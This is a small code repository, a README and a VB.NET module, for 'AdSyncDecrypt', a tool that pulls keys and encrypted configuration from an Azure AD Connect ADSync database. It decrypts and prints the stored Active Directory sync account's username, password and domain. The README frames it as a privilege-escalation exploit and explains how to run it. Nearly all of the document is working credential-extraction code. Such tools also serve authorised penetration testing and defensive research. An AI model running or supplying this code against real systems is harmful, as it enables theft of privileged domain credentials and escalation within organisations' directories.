├── README.md └── MainModule.vb /README.md: -------------------------------------------------------------------------------- 1 | # AdSyncDecrypt 2 | 3 | See here for explanation: https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/ 4 | 5 | Note: This program must be run while the AD Sync Bin folder is your “working directory”, or has been added to the PATH variable. An easy way to do this is simply navigate to the folder in Powershell or Command Prompt (i.e cd “C:\Program Files\Microsoft Azure AD Sync\Bin”), and then run the program by typing the full path to wherever you have stored it. You also need to make sure the mcrypt.dll (icluded in the ZIP file you download from the Release tab) is in the same directory the program is in. Failure to do either of these things will result in a Module Not Found error. 6 | -------------------------------------------------------------------------------- /MainModule.vb: -------------------------------------------------------------------------------- 1 | Imports Microsoft.DirectoryServices.MetadirectoryServices.Cryptography 2 | Imports System.Data.SqlClient 3 | Imports System.Xml 4 | Module MainModule 5 | 6 | Sub Main() 7 | Try 8 | Console.WriteLine(Environment.NewLine & "======================" & Environment.NewLine & 9 | "AZURE AD SYNC CREDENTIAL DECRYPTION TOOL" & Environment.NewLine & 10 | "Based on original code from: https://github.com/fox-it/adconnectdump" & Environment.NewLine & 11 | "======================" & Environment.NewLine) 12 | 13 | Dim SqlConnectionString As String = "Data Source=(LocalDB)\\.\\ADSync;Initial Catalog=ADSync;Connect Timeout=20" 14 | 15 | If My.Application.CommandLineArgs.Count > 0 AndAlso String.Compare(My.Application.CommandLineArgs(0), "-FullSql", True) = 0 Then 16 | SqlConnectionString = "Server=LocalHost;Database=ADSync;Trusted_Connection=True;" 17 | End If 18 | 19 | Dim KeyId As UInteger 20 | Dim InstanceId As Guid 21 | Dim Entropy As Guid 22 | Dim ConfigXml As String 23 | Dim EncryptedPasswordXml As String 24 | 25 | Using SqlConn As New SqlConnection(SqlConnectionString) 26 | Try 27 | Console.WriteLine("Opening database connection...") 28 | SqlConn.Open() 29 | Using SqlCmd As New SqlCommand("SELECT instance_id, keyset_id, entropy FROM mms_server_configuration;", SqlConn) 30 | Console.WriteLine("Executing SQL commands...") 31 | Using Reader As SqlDataReader = SqlCmd.ExecuteReader 32 | Reader.Read() 33 | InstanceId = DirectCast(Reader("instance_id"), Guid) 34 | KeyId = CUInt(Reader("keyset_id")) 35 | Entropy = DirectCast(Reader("entropy"), Guid) 36 | End Using 37 | End Using 38 | Using SqlCmd As New SqlCommand("SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'", SqlConn) 39 | Using Reader As SqlDataReader = SqlCmd.ExecuteReader 40 | Reader.Read() 41 | ConfigXml = CStr(Reader("private_configuration_xml")) 42 | EncryptedPasswordXml = CStr(Reader("encrypted_configuration")) 43 | End Using 44 | End Using 45 | Catch Ex As Exception 46 | Console.WriteLine("Error reading from database: " & Ex.Message) 47 | Exit Sub 48 | Finally 49 | Console.WriteLine("Closing database connection...") 50 | SqlConn.Close() 51 | End Try 52 | Try 53 | Console.WriteLine("Decrypting XML...") 54 | Dim CryptoManager As New KeyManager 55 | CryptoManager.LoadKeySet(Entropy, InstanceId, KeyId) 56 | Dim Decryptor As Key = Nothing 57 | CryptoManager.GetActiveCredentialKey(Decryptor) 58 | Dim PlainTextPasswordXml As String = Nothing 59 | Decryptor.DecryptBase64ToString(EncryptedPasswordXml, PlainTextPasswordXml) 60 | Console.WriteLine("Parsing XML...") 61 | Dim Domain As String = String.Empty 62 | Dim Username As String = String.Empty 63 | Dim Password As String = String.Empty 64 | Dim XmlDoc As New XmlDocument 65 | XmlDoc.LoadXml(PlainTextPasswordXml) 66 | Dim XmlNav As XPath.XPathNavigator = XmlDoc.CreateNavigator 67 | Password = XmlNav.SelectSingleNode("//attribute").Value 68 | XmlDoc.LoadXml(ConfigXml) 69 | XmlNav = XmlDoc.CreateNavigator 70 | Domain = XmlNav.SelectSingleNode("//parameter[@name='forest-login-domain']").Value 71 | Username = XmlNav.SelectSingleNode("//parameter[@name='forest-login-user']").Value 72 | Console.WriteLine("Finished!" & 73 | Environment.NewLine & Environment.NewLine & 74 | "DECRYPTED CREDENTIALS:" & Environment.NewLine & 75 | "Username: " & Username & Environment.NewLine & 76 | "Password: " & Password & Environment.NewLine & 77 | "Domain: " & Domain & Environment.NewLine) 78 | Catch ex As Exception 79 | Console.WriteLine("Error decrypting: " & ex.Message) 80 | End Try 81 | End Using 82 | Catch ex As Exception 83 | Console.WriteLine("Unexpected error: " & ex.Message) 84 | End Try 85 | End Sub 86 | 87 | End Module 88 | --------------------------------------------------------------------------------